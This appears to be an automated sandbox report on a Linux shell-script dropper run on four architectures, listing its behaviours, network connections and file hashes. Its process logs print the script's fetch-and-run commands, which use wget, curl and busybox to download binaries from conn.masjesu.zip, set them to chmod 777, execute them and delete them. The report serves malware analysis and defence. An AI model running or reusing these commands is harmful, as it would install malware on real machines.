Analysis Overview
SHA256
cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c
Threat Level: Shows suspicious behavior
The file cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-29 02:55
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-29 02:55
Reported
2024-10-29 02:57
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
131s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh
[/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 151.101.193.91:443 | | tcp |
| GB | 89.187.167.6:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-29 02:55
Reported
2024-10-29 02:57
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
21s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Processes
/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh
[/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-29 02:55
Reported
2024-10-29 02:57
Platform
debian9-mipsbe-20240611-en
Max time kernel
105s
Max time network
134s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY | /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY | N/A |
| N/A | /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h | /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h | N/A |
| N/A | /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui | /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui | N/A |
| N/A | /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z | /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z | N/A |
| N/A | /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA | /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA | N/A |
| N/A | /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie | /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie | N/A |
| N/A | /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK | /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK | N/A |
| N/A | /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG | /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG | N/A |
| N/A | /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS | /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS | N/A |
| N/A | /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv | /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv | N/A |
| N/A | /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC | /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC | N/A |
| N/A | /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 | /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 | N/A |
| N/A | /tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF | /tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF | N/A |
| N/A | /tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p | /tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK | /usr/bin/curl | N/A |
Processes
/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh
[/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/bin/chmod
[chmod 777 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
[./20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/bin/rm
[rm 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h
| MD5 | 7689ca8c5bc85cf6b78ef89323d4df6a |
| SHA1 | a1392ec3b571b3de167f0b9a5dadab4f14a2db76 |
| SHA256 | 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5 |
| SHA512 | 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-29 02:55
Reported
2024-10-29 02:57
Platform
debian9-mipsel-20240226-en
Max time kernel
149s
Max time network
108s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY | /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY | N/A |
| N/A | /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h | /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h | N/A |
| N/A | /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui | /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui | N/A |
| N/A | /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z | /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z | N/A |
| N/A | /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA | /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA | N/A |
| N/A | /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie | /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie | N/A |
| N/A | /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK | /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK | N/A |
| N/A | /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG | /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG | N/A |
| N/A | /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS | /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS | N/A |
| N/A | /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv | /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv | N/A |
| N/A | /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC | /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv | /usr/bin/curl | N/A |
Processes
/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh
[/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/bin/chmod
[chmod 777 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
[./20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/bin/rm
[rm 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/bin/chmod
[chmod 777 OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h
[./OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/bin/rm
[rm OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/bin/chmod
[chmod 777 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
[./4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/bin/rm
[rm 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/bin/chmod
[chmod 777 kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
[./kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/bin/rm
[rm kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/bin/chmod
[chmod 777 O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
[./O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/bin/rm
[rm O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/bin/chmod
[chmod 777 uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
[./uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/bin/rm
[rm uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/bin/chmod
[chmod 777 yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
[./yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/bin/rm
[rm yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/bin/chmod
[chmod 777 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG
[./3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/bin/rm
[rm 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/bin/chmod
[chmod 777 EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
[./EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/bin/rm
[rm EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/bin/chmod
[chmod 777 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv
[./4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/bin/rm
[rm 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/bin/chmod
[chmod 777 u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC
[./u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/bin/rm
[rm u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
| MD5 | 7689ca8c5bc85cf6b78ef89323d4df6a |
| SHA1 | a1392ec3b571b3de167f0b9a5dadab4f14a2db76 |
| SHA256 | 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5 |
| SHA512 | 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471 |
/tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |